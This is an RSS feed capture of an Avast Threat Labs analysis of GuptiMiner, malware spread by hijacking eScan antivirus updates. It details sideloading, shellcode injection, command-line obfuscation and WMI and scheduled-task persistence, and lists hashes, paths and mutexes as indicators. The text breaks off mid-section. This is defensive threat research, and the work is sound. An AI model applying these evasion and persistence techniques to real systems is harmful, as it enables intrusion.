[Valid RSS] This is a valid RSS feed.
Source: https://decoded.avast.io/feed/

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>

<channel>
<title>Avast Threat Labs</title>
<atom:link href="https://decoded.avast.io/feed/" rel="self" type="application/rss+xml" />
<link>https://decoded.avast.io/</link>
<description>Uncovering Tactics, Techniques and Procedures of malicious actors</description>
<lastBuildDate>Tue, 23 Apr 2024 08:54:25 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>hourly</sy:updatePeriod>
<sy:updateFrequency>1</sy:updateFrequency>
<generator>https://wordpress.org/?v=6.4.3</generator>

<image>
<url>https://decoded.avast.io/wp-content/uploads/sites/2/2019/07/cropped-Asset-25ldpi-32x32.png</url>
<title>Avast Threat Labs</title>
<link>https://decoded.avast.io/</link>
<width>32</width>
<height>32</height>
</image>
<item>
<title>GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining</title>
<link>https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining</link>
<dc:creator><![CDATA[Jan Rubín and Milánek]]></dc:creator>
<pubDate>Tue, 23 Apr 2024 09:00:00 +0000</pubDate>
<category><![CDATA[PC]]></category>
<category><![CDATA[antivirus]]></category>
<category><![CDATA[backdoor]]></category>
<category><![CDATA[cryptomining]]></category>
<category><![CDATA[Kimsuky]]></category>
<category><![CDATA[malware]]></category>
<category><![CDATA[mitm]]></category>
<category><![CDATA[xmrig]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=8115</guid>

<description><![CDATA[<p>Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers.</p>
<p>The post <a href="https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/">GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<h2 class="wp-block-heading">Key Points</h2>

<ul>
<li>Avast discovered and analyzed a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers</li>
<li>Avast disclosed the vulnerability to both eScan antivirus and India CERT. On 2023-07-31, eScan confirmed that the issue was fixed and successfully resolved</li>
<li>The campaign was orchestrated by a threat actor with possible ties to Kimsuky</li>
<li>Two different types of backdoors have been discovered, targeting large corporate networks</li>
<li>The final payload distributed by GuptiMiner was also XMRig</li>
</ul>

<h2 class="wp-block-heading">Introduction</h2>

<p>We’ve been tracking a curious one here. GuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with several techniques, including DNS requests to the attacker’s own DNS servers, DLL sideloading, extracting payloads from innocent-looking images, and signing its payloads with a custom trusted root anchor certification authority, among others.</p>

<p>The main objective of GuptiMiner is to distribute backdoors within big corporate networks. We’ve encountered two different variants of these backdoors: The first is an enhanced build of PuTTY Link, providing SMB scanning of the local network and enabling lateral movement over the network to potentially vulnerable Windows 7 and Windows Server 2008 systems on the network. The second backdoor is multi-modular, accepting commands from the attacker to install more modules as well as focusing on scanning for stored private keys and cryptowallets on the local system.</p>

<p>Interestingly, GuptiMiner also distributes XMRig on the infected devices, which is a bit unexpected for such a thought-through operation.</p>

<p>The actors behind GuptiMiner have been capitalizing on an insecurity within an update mechanism of the Indian antivirus vendor eScan to distribute the malware by performing a man-in-the-middle attack. We disclosed this security vulnerability to both eScan and the India CERT and received confirmation on 2023-07-31 from eScan that the issue was fixed and successfully resolved.</p>

<p>GuptiMiner is a long-standing malware, with traces of it dating back to 2018, though it is likely that it is even older. We have also found that GuptiMiner has possible ties to Kimsuky, a notorious North Korean APT group, by observing similarities between the Kimsuky keylogger and parts of the GuptiMiner operation.<br>In this analysis, we will cover GuptiMiner’s features and its evolution over time. We will also note in which samples the particular features are contained or introduced, to help the reader navigate the vast range of IoCs.</p>

<p>It is also important to note that since users rarely install more than one AV on their machine, we may have limited visibility into GuptiMiner’s activity and its overall scope. Because of this, we might be looking only at the tip of the iceberg and the true scope of the entire operation may still be subject to discovery.</p>

<h2 class="wp-block-heading">Infection Chain</h2>

<p>To illustrate the complexity of the whole infection, we’ve provided a flow chart containing all parts of the chain. Note that some of the used filenames and/or workflows can vary slightly depending on the specific version of GuptiMiner, but the flowchart below illustrates the overall process.</p>

<p>The whole process starts with eScan requesting an update from the update server, where an unknown MitM intercepts the download and swaps the update package with a malicious one. Then, eScan unpacks and loads the package and a DLL is sideloaded by clean eScan binaries. This DLL enables the rest of the chain, which continues with multiple shellcodes and intermediary PE loaders.</p>

<p>The resulting GuptiMiner deployment runs XMRig on the infected machine and also introduces backdoors, which are activated when the malware lands in large corporate networks.</p>

<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58.png"><img fetchpriority="high" decoding="async" width="579" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-579x1024.png" alt="" class="wp-image-8511" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-579x1024.png 579w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-170x300.png 170w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-768x1358.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-868x1536.png 868w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58-1158x2048.png 1158w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-58.png 2024w" sizes="(max-width: 579px) 100vw, 579px" /></a><figcaption class="wp-element-caption"><em>GuptiMiner’s infection chain</em></figcaption></figure></div>

<h2 class="wp-block-heading">Evolution and Timelines</h2>

<p>GuptiMiner has been active since at least 2018. Over the years, the developers behind it have improved the malware significantly, bringing new features to the table. We will describe the specific features in detail in the respective subsections.</p>

<p>With that said, we also wanted to illustrate the significant IoCs in a timeline representation, showing how they changed over time – focusing on mutexes, PDBs, and used domains. These timelines were created by scanning for the IoCs over a large sample dataset, taking the first and last compilation timestamps of the samples, and then forming the intervals. Note that the scanned dataset is larger than the IoCs listed in the <a href="#ioc">IoC section</a>. For a more detailed list of IoCs, please visit our <a href="https://github.com/avast/ioc/tree/master/GuptiMiner" target="_blank" rel="noreferrer noopener">GitHub</a>.</p>

<h3 class="wp-block-heading" id="domains-in-time">Domains in Time</h3>

<p>In general, GuptiMiner uses the following types of domains during its operations:</p>

<ul>
<li><code>Malicious DNS</code> – GuptiMiner hosts its own DNS servers for serving the true destination domain addresses of C&amp;C servers via DNS TXT responses</li>
<li><code>Requested domains</code> – Domains the malware queries the DNS servers for</li>
<li><code>PNG download</code> – Servers for downloading payloads in the form of PNG files. These PNG files are valid images (a logo of T-Mobile) that contain appended shellcodes at their end</li>
<li><code>Config mining pool</code> – GuptiMiner contains two different configurations of mining pools. One is hardcoded directly in the XMRig config, which is denoted in this group</li>
<li><code>Modified mining pool</code> – GuptiMiner has the ability to modify the pre-defined mining pools, which is denoted in this group</li>
<li><code>Final C&amp;C</code> – Domains used in the last backdoor stage of GuptiMiner, providing additional malware capabilities in the backdoored systems</li>
<li><code>Other</code> – Domains serving different purposes, e.g., used in scripts</li>
</ul>

<p>Note that since the malware connects to the malicious DNS servers directly, this use of the DNS protocol is completely separated from the DNS network. Thus, no legitimate DNS server will ever see the traffic from this malware. The DNS protocol is used here as a functional equivalent of telnet. Because of this, the technique is not DNS spoofing, since spoofing traditionally happens on the DNS network.</p>

<p>Furthermore, the fact that the servers GuptiMiner asks for in the <code>Requested domain</code> category actually exist is purely a coincidence, or rather a network obfuscation to confuse network monitoring tools and analysts.</p>

<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2.png"><img decoding="async" width="750" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-750x1024.png" alt="" class="wp-image-8395" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-750x1024.png 750w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-220x300.png 220w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-768x1049.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2-1125x1536.png 1125w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-2.png 1262w" sizes="(max-width: 750px) 100vw, 750px" /></a><figcaption class="wp-element-caption"><em>Timeline illustrating GuptiMiner’s usage of domains in time</em></figcaption></figure></div>

<p>From this timeline, it is apparent that the authors behind GuptiMiner realize that the correct setup of their DNS servers is crucial for the whole chain to work properly. Because of this, the biggest rotation and the shortest timeframes are found in the <code>Malicious DNS</code> group.</p>

<p>Furthermore, since the domains in the <code>Requested domain</code> group are irrelevant (at least from the technical viewpoint), we can notice that the authors reuse the same domain names for longer periods of time.</p>

<h3 class="wp-block-heading" id="mutexes-in-time">Mutexes in Time</h3>

<p>Mutexes help ensure the correct execution flow of software, and malware authors often use these named objects for the same purpose. Since 2018, GuptiMiner has changed its mutexes multiple times. Most significantly, we can notice a change since 2021, when the authors changed the mutexes to reflect the compilation/distribution dates of their new versions.</p>

<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3.png"><img decoding="async" width="975" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3-975x1024.png" alt="" class="wp-image-8398" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3-975x1024.png 975w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3-286x300.png 286w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3-768x807.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-3.png 1270w" sizes="(max-width: 975px) 100vw, 975px" /></a><figcaption class="wp-element-caption"><em>Timeline illustrating GuptiMiner’s usage of mutexes in time</em></figcaption></figure></div>

<p>An attentive reader can likely observe two takeaways: The first is the apparent outliers in the usage of <code>MIVOD_6</code>, <code>SLDV15</code>, <code>SLDV13</code>, and <code>Global\Wed Jun&nbsp; 2 09:43:03 2021</code>. According to our data, these mutexes were indeed reused multiple times in different builds, creating larger timeframes than expected.</p>

<p>The second is the re-introduction of the <code>PROCESS_</code> mutex near the end of last year. At this time, the authors reintroduced the mutex with the string in UTF-16 encoding, which we noted separately.</p>

<h3 class="wp-block-heading">PDBs in Time</h3>

<p>With regard to debugging symbols, the authors of GuptiMiner left multiple PDB paths in their binaries. Most of the time, they contain strings like <code>MainWork</code>, <code>Projects</code>, etc.</p>

<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4.png"><img loading="lazy" decoding="async" width="1024" height="340" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-1024x340.png" alt="" class="wp-image-8400" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-1024x340.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-300x100.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-768x255.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-1536x510.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-4-2048x680.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Timeline illustrating PDBs contained in GuptiMiner in time</em></figcaption></figure></div>

<h2 class="wp-block-heading" id="installation-process">Stage 0 – Installation Process</h2>

<h3 class="wp-block-heading">Intercepting the Updates</h3>

<p>Everyone should update their software, right? Usually, the individual either downloads the new version manually from the official vendor’s site, or – preferably – the software itself performs the update automatically without much thought or action from the user. But what happens when someone is able to hijack this automatic process?</p>

<p>Our investigation started when we observed that some of our users were receiving unusual responses to otherwise legitimate requests, for example to:</p>

<p><code>http://update3[.]mwti[.]net/pub/update/updll3.dlz</code></p>

<p>This is a legitimate URL for downloading the <code>updll3.dlz</code> file which is, under normal circumstances, a legitimate archive containing the update of the eScan antivirus. However, we started seeing suspicious behavior on some of our clients, originating from exactly such URLs.</p>

<p>What we uncovered was that the actors behind GuptiMiner were performing a man-in-the-middle (MitM) attack to deliver an infected installer to the victim’s PC instead of the update. Unfortunately, we currently don’t have information on how the MitM was performed. We assume that some kind of pre-infection had to be present on the victim’s device or their network, causing the MitM.</p>

<h3 class="wp-block-heading">Update Package</h3>

<p><code><em>c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3</em><br><em>(version.dll, 2018-04-19 09:47:41 UTC)</em></code></p>

<p>Throughout the analysis, we will try to describe not just the flow of the infection chain, malware techniques, and functionalities of the stages, but we will also focus on different versions, describing how the malware authors developed and changed GuptiMiner over time.</p>

<p>The first GuptiMiner sample that we were able to find was compiled on Tuesday, 2018-04-19 09:47:41 and it was uploaded to VirusTotal the day after from India, followed by an upload from Germany:<br><code>c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3</code></p>

<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-5.png"><img loading="lazy" decoding="async" width="561" height="226" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-5.png" alt="" class="wp-image-8403" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-5.png 561w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-5-300x121.png 300w" sizes="(max-width: 561px) 100vw, 561px" /></a></figure></div>

<p>This file was named <code>C:\Program Files\eScan\VERSION.DLL</code>, which indicates that the target audience is indeed eScan users and that it comes from an update package downloaded by the AV.</p>

<p>Even though this version lacked several features present in the newer samples, the installation process is still the same, as follows:</p>

<ol start="1">
<li>The eScan updater triggers the update</li>
<li>The downloaded package file is replaced with a malicious one on the wire because of missing HTTPS encryption (MitM is performed)</li>
<li>A malicious package <code>updll62.dlz</code> is downloaded and unpacked by the eScan updater</li>
<li>The contents of the package contain a malicious DLL (usually called <code>version.dll</code>) that is sideloaded by eScan. Because of the sideloading, the DLL runs with the same privileges as the source process – eScan – and it is loaded the next time eScan runs, usually after a system restart</li>
<li>If a mutex is not present in the system (depends on the version, e.g. <code>Mutex_ONLY_ME_V1</code>), the malware searches for a <code>services.exe</code> process and injects its next stage into the first one it can find</li>
<li>Cleanup is performed, removing the update package</li>
</ol>

<p>The malicious DLL contains additional functions which are not present in the clean one. Thankfully, the names are very verbose, so no analysis was required for most of them. The list of the functions can be seen below.</p>

<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-6.png"><img loading="lazy" decoding="async" width="519" height="510" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-6.png" alt="" class="wp-image-8405" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-6.png 519w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-6-300x295.png 300w" sizes="(max-width: 519px) 100vw, 519px" /></a><figcaption class="wp-element-caption"><em>Additional exported functions</em></figcaption></figure></div>

<p>Some functions, however, are unique. For example, the function <code>X64Call</code> provides Heaven’s Gate, i.e., it is a helper function for running x64 code inside a 32-bit process on a 64-bit system. The malware needs this to be able to run the injected shellcode regardless of the OS version and thus the bitness of the <code>services.exe</code> process.</p>

<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14.png"><img loading="lazy" decoding="async" width="668" height="1192" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14.png" alt="" class="wp-image-8419" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14.png 668w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14-168x300.png 168w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-14-574x1024.png 574w" sizes="(max-width: 668px) 100vw, 668px" /></a><figcaption class="wp-element-caption"><em>Heaven’s Gate to run the shellcode in an x64 environment when required</em></figcaption></figure></div>

<p>To keep the original eScan functionality intact, the malicious <code>version.dll</code> also needs to handle the original legacy <code>version.dll</code> functionality. This is done by forwarding all the exported functions of the original DLL. When a call to a legacy DLL function is identified, GuptiMiner resolves the original function and calls it afterwards.</p>

<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-8.png"><img loading="lazy" decoding="async" width="518" height="228" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-8.png" alt="" class="wp-image-8408" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-8.png 518w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-8-300x132.png 300w" sizes="(max-width: 518px) 100vw, 518px" /></a><figcaption class="wp-element-caption"><em>Resolving function that ensures all the original <code>version.dll</code> exports are available</em></figcaption></figure></div>

<h3 class="wp-block-heading">Injected Shellcode in services.exe</h3>

<p>After the shellcode is injected into <code>services.exe</code>, it serves as a loader of the next stage. This is done by reading an embedded PE file stored in plaintext form.</p>

<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-9.png"><img loading="lazy" decoding="async" width="550" height="287" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-9.png" alt="" class="wp-image-8409" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-9.png 550w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-9-300x157.png 300w" sizes="(max-width: 550px) 100vw, 550px" /></a><figcaption class="wp-element-caption"><em>Embedded PE file loaded by the shellcode</em></figcaption></figure></div>

<p>This PE file is loaded by standard means, but additionally, the shellcode also destroys the PE’s DOS header and runs it by calling its entry point, and it also removes the embedded PE from its original location in memory altogether.</p>

<h4 class="wp-block-heading">Command Line Manipulation</h4>

<p>Across the entire GuptiMiner infection chain, every shellcode which loads and injects PE files also manipulates the command line of the current process. This is done by manipulating the result of <code>GetCommandLineA/W</code>, which changes the resulting command line displayed, for example, in Task Manager.</p>

<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11.png"><img loading="lazy" decoding="async" width="1127" height="581" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11.png" alt="" class="wp-image-8412" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11.png 1127w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11-300x155.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11-1024x528.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-11-768x396.png 768w" sizes="(max-width: 1127px) 100vw, 1127px" /></a><figcaption class="wp-element-caption"><em>Command line manipulation function</em></figcaption></figure></div>

<p>After inspecting this functionality, we believe it either doesn’t work as the authors intended or we don’t understand its usage. Long story short, the command line is changed in such a way that everything before the first <code>--parameter</code> is skipped, and this parameter is then appended to the process name.</p>

<p>To illustrate this, we could take a command:<br><code>notepad.exe param1 --XX param2</code><br>which will be transformed into:<br><code>notepad.exeXX param2</code></p>

<p>However, we <strong>have not seen</strong> a usage like <code>power --shell.exe param1 param2</code> that would result in:<br><code>powershell.exe param1 param2</code><br>nor have we seen any concealment of parameters (like usernames and passwords for XMRig), a type of behavior we would anticipate when encountering something like this. In either case, this functionality is obfuscating the command line appearance, which is worth mentioning. An interested reader can play around with the functionality at the awesome godbolt.org <a href="https://godbolt.org/#z:OYLghAFBqd5QCxAYwPYBMCmBRdBLAF1QCcAaPECAMzwBtMA7AQwFtMQByARg9KtQYEAysib0QXACx8BBAKoBnTAAUAHpwAMvAFYTStJg1DIApACYAQuYukl9ZATwDKjdAGFUtAK4sGIM6SuADJ4DJgAcj4ARpjEIJIAzKQADqgKhE4MHt6%2B/ilpGQIhYZEsMXGJtpj2jgJCBEzEBNk%2BfgF2mA6Z9Y0ExRHRsfFJCg1NLbntY32hA2VDiQCUtqhexMjsHOYJocjeWADUJgluo8ShwAB0CMfYJhoAgtu7%2B5hHJ2wsJACe17f3TzMOwYey8h2OpwI%2BFQfwSd0eANCBAOBxYhjwyS8BgImAA%2BoZ0nhcWgWGiGOhcbRZhBkAhGgcAFQkskUqlhRYAkwAdisjxRSIOeGOFgOAHpRUcAKwWYgKZLWMwaG6SgAiUplUWSAFozAAOZUqgH8wQHGiygi4uVMDb4qg44i45LEVAbBQKXHMNjCsUSkzS2XyyxmSQG9XETU6kN%2Bw18wUms2jXHoJgKG4JEXisNyhX66NhiOKg1Go4I2PFhMW5Op95qjTC8t4c2W5LWvFMO2xR3O13uz1vY61%2Bux/jEA4QQU1g519MHZmGVmzP0WIWq73Wax4A4css84sozNarV7wVUMcHMBgCtJlMII5mABs5nvs9QpPnlMX0pXaoHA/PHC1MAODvR8HxfN9yQ/MIl03awDi4PNfwSNUgMA4DtweFEsNNRtEyrW8/yFdNjzwU9xwvK8rRtdt7S7F1MDdD1WH7B8n3AlkoMwGDEOQv8gP/EC2KZV8OLZN4Lz4rYzDMIDjxRbk3AU89L1wi0qLbDsHSdejGL7QSwLnSCxO41Ua0kgSnzYwyF2gr8Di1eCeMNZD/3MGTgMssDhIgmz%2B14lzZOk/iMOw7leUw7CcKbdTbVo7SeyYthJyI8LQq5GMIu5DL%2BTI5Sr3wo4uUUoq8tU5tW1izt4oY3tmK3Y9iEwAg1gYeCgiCIcIs%2BL4ADdMAgY8n2szil0oltqM0uiEr7aNSEGh9huM6V8pvO8RTMWaSPsqLEximiqu7GrEreBz7w5YjY0a5riFarh2s6rLOUeAU0VCCAkVIWc6WIBkGQwsLj1pelkBYdAlycu8zAYVAcRbdBLkwVQ3hbYhWAULh7K1AANLGDhRtGNslNwGDczrsKdJEqAG6TzElBQ3M%2BkH0HO1KsLJDEsSYHF8QYQliRE98xJpUGWePCnBCptzD1uO86b9YmGdnEWHtLJ50o4ZZaE4SVeD8DgtFIVBOEUyw4IUVZ1hYhIeFIAhNA15YAGsQASBJLldj3Pa9%2B99E4SRdftw3OF4BQQA0W37eWOBYCQElkjoWJyEoOOE7iYAuASAIaFoe1Q4gKJA6iUJGm%2BTgbaL5hiG%2BAB5KJtE6O3uF4ZlGAIauGFoUv9d4LAoi8YA3DEWhQ6b0gsDJYBxG7sfGwbvA%2BpHg3Ec6LwcUDpFqkDqkolRquPCwQOCHOFgy41vgDGABQADU8EwAB3avkkYU%2BZEEEQxHYKRX/kJQ1ED3QuD6EMMYdclh9B4CiKHSAyxUDJFqLzTgWpq5mF4KgPqxBzhYCgRAZYHQujOAgK4CYfhAHBFmKUcoehUjpHgcQqhBR4H9AoUMQBeD4E9HGJ4Voeg2HdGmEwwYcRWHTDocI3oAj5hCNwRbDYEhNbawDtPI2wFVC6nvFqe8kgDjAGQMgeCbszBjlwIQEgd5raLF4I3LQiwnYuzdl7BxHsfZaw4P7UgesDbKJDmHCO3co4wEQCAVYBBMQECTjSV88d6DEHCMxTgqj1GaO0bo/RlwUGBHwEQTBeh%2BBv1EOIL%2BuSf4qHUNPABpA76o2SKfeRHAdbuMDso6uq9QkHFQKeBJGitE6L0RnNJY4PAsCibEMxXALG%2BOsbY127tHEON9q4xRnjg62B8VYh28z0keNQcstZNjSDoPSM4SQQA%3D" target="_blank" rel="noreferrer noopener">here</a>.</p>

  361. <h3 class="wp-block-heading" id="code-virtualization">Code Virtualization&nbsp;</h3>
  362.  
  363.  
  364.  
  365. <p><code><em>7a1554fe1c504786402d97edecc10c3aa12bd6b7b7b101cfc7a009ae88dd99c6</em><br><em>(version.dll, 2018-06-12 03:30:01)</em>&nbsp;</code></p>
  366.  
  367.  
  368.  
  369. <p>Another version with a mutex <code>ONLY_ME_V3</code> introduced a code virtualization. This can be observed by an additional section in the PE file called <code>.v_lizer</code>. This section was also renamed a few times in later builds.</p>
  370.  
  371.  
  372. <div class="wp-block-image">
  373. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16.png"><img loading="lazy" decoding="async" width="1232" height="322" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16.png" alt="" class="wp-image-8423" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16.png 1232w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16-300x78.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16-1024x268.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-16-768x201.png 768w" sizes="(max-width: 1232px) 100vw, 1232px" /></a><figcaption class="wp-element-caption"><em>A new section with the virtualized code is called <code>.v_lizer</code></em></figcaption></figure></div>
  374.  
  375.  
  376. <p>Thankfully, the obfuscation is rather weak, since the shellcode as well as the embedded PE file are still present in plaintext form.&nbsp;</p>
  377.  
  378.  
  379.  
  380. <p>Furthermore, the authors started to distinguish between the <code>version.dll</code> stage and the PE file loaded by the shellcode by using an additional mutex. Previously, both stages used the shared mutex <code>ONLY_ME_Vx</code>; now the sideloading stage uses <code>MTX_V101</code> as its mutex.</p>
  381.  
  382.  
  383.  
  384. <h2 class="wp-block-heading" id="installation-improvements">Stage 0.9 – Installation Improvements</h2>
  385.  
  386.  
  387.  
  388. <p><code><em>3515113e7127dc41fb34c447f35c143f1b33fd70913034742e44ee7a9dc5cc4c</em><br><em>(2021-03-28 14:41:07 UTC)</em>&nbsp;</code></p>
  389.  
  390.  
  391.  
  392. <p>The installation process has undergone multiple improvements over time, and, since it is rather different compared to older variants, we decided to describe it separately as an intermediary Stage 0.9. With these improvements, the authors introduced the use of scheduled tasks, WMI events, two differently loaded next stages (<a href="#png-loader">Stage 1 – PNG loader</a>), turning off Windows Defender, and installing crafted certificates into Windows.&nbsp;</p>
  393.  
  394.  
  395.  
  396. <p>There are also multiple files dropped at this stage, enabling further sideloading by the malware. These files are clean and serve exclusively for sideloading purposes. The malicious DLLs that are being sideloaded are two PNG loaders (Stage 1):&nbsp;</p>
  397.  
  398.  
  399.  
  400. <ul>
  401. <li><code>de48abe380bd84b5dc940743ad6727d0372f602a8871a4a0ae2a53b15e1b1739 *atiadlxx.dll</code>&nbsp;</li>
  402.  
  403.  
  404.  
  405. <li><code>e0dd8af1b70f47374b0714e3b368e20dbcfa45c6fe8f4a2e72314f4cd3ef16ee *BrLogAPI.dll</code>&nbsp;</li>
  406. </ul>
  407.  
  408.  
  409.  
  410. <h3 class="wp-block-heading">WMI Events&nbsp;</h3>
  411.  
  412.  
  413.  
  414. <p><code><em>de48abe380bd84b5dc940743ad6727d0372f602a8871a4a0ae2a53b15e1b1739</em><br><em>(atiadlxx.dll, 2021-03-28 14:30:11 UTC)</em>&nbsp;</code></p>
  415.  
  416.  
  417.  
  418. <p>At this stage, WMI events are used for loading the first of the PNG loaders. This loader is extracted to the path:<br><code>C:\PROGRAMDATA\AMD\CNext\atiadlxx.dll</code>&nbsp;</p>
  419.  
  420.  
  421.  
  422. <p>Along with it, additional clean files used for sideloading are dropped into either (or both) of these locations:&nbsp;<br><code>C:\ProgramData\AMD\CNext\slsnotif.exe&nbsp;<br>C:\ProgramData\AMD\CNext\msvcr120.dll</code><br>or<br><code>C:\Program Files (x86)\AMD\CNext\CCCSlim\slsnotify.exe<br>C:\Program Files (x86)\AMD\CNext\CCCSlim\msvcr120.dll&nbsp;</code></p>
  423.  
  424.  
  425.  
  426. <p>The clean file <code>slsnotify.exe</code> is then registered via a WMI event in such a way that it is executed when these conditions are met:</p>
  427.  
  428.  
  429. <div class="wp-block-image">
  430. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17.png"><img loading="lazy" decoding="async" width="850" height="192" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17.png" alt="" class="wp-image-8424" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17-300x68.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-17-768x173.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>WMI conditions to trigger sideloading</em></figcaption></figure></div>
  431.  
  432.  
  433. <p>In other words, the sideloading is performed on a workday in January, July, or November. The numbers represented by <code>%d</code> are randomly selected values. The two possibilities for the hour are exactly two hours apart and fall within the range of 11–16 or 13–18 (inclusive). This conditioning further underlines the longevity of GuptiMiner operations.</p>
  434.  
  435.  
  436.  
  437. <h3 class="wp-block-heading">Scheduled Tasks</h3>
  438.  
  439.  
  440.  
  441. <p><code><em>e0dd8af1b70f47374b0714e3b368e20dbcfa45c6fe8f4a2e72314f4cd3ef16ee</em><br><em>(BrLogAPI.dll, 2021-03-28 14:10:27 UTC)</em></code></p>
  442.  
  443.  
  444.  
  445. <p>Similarly to the WMI events, GuptiMiner also drops a clean binary for sideloading at this location:<br><code>C:\ProgramData\Brother\Brmfl14c\BrRemPnP.exe</code>&nbsp;</p>
  446.  
  447.  
  448.  
